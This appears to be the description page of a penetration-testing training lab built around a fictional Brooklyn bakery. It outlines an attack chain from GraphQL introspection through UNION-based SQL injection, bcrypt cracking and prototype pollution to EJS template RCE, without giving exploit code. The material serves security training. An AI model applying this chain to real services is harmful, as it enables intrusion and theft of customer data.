Hearth
Hearth is a small Brooklyn artisan bakery with a public storefront and an internal CRM for wholesale operations. Their GraphQL menu API leaks more than the daily bread.
The Scenario
Hearth is a small Brooklyn bakery owned by Mickey, who started with sourdough out of a Bed-Stuy kitchen and grew into a wholesale operation supplying cafes, hotels, and restaurants across the city. The customer-facing storefront lists the day's bakes; the staff CRM — running on its own subdomain — handles wholesale accounts, daily order schedules, and team tasks.
Mickey's competitor's tech-savvy cousin claimed at a wedding last weekend that they'd "seen all the customer data." Mickey laughed it off. The next day three of Hearth's biggest wholesale accounts received cold-call pitches from that same competitor. Find the path. Start at the public storefront and end with proof you can read whatever's on Mickey's machine.
Lab Intel
Synopsis
Hearth runs a public Apollo GraphQL menu API and a separate staff CRM. A vulnerable resolver argument concatenates user input into raw SQL and leaks credentials plus SSO tokens; the CRM's settings endpoint accepts JSON deep-merged with no prototype protection, and EJS does the rest.
Architecture
A medium-difficulty multi-service lab built on four containers — an nginx gateway, two Node.js surfaces (the public bakery storefront with Apollo Server and the staff CRM with sessions and EJS), and a Postgres backend. The chain combines GraphQL recon, UNION-based SQLi against a string-concatenated WHERE clause, bcrypt cracking forced because a leaked OAuth token only opens a low-priv session, and a prototype pollution sink that triggers RCE on the very next EJS template compile.
Who It's For
Built for intermediate testers comfortable enumerating modern web APIs and chaining several primitives. You should have prior experience with GraphQL introspection, UNION-based SQL injection, and basic Node.js internals. Familiarity with prototype pollution as a bug class is a plus but not required — the gadget itself is well-documented.
Skills You'll Practice
- GraphQL schema enumeration via introspection
- UNION-based SQL injection through a permissively-validated query argument
- bcrypt offline cracking with hashcat (-m 3200)
- Differentiating low-priv OAuth replay sessions from admin sessions
- Prototype pollution via `_.merge` and the EJS `outputFunctionName` RCE gadget
What You'll Gain
- GraphQL recon: DevTools traffic capture, introspection, schema mapping
- Recognising the difference between safe-looking input validation and actually safe input handling
- Modern Node.js exploitation: prototype pollution from request body to template-engine RCE
- Multi-service attack chaining: storefront → DB exfil → CRM auth → CRM settings → shell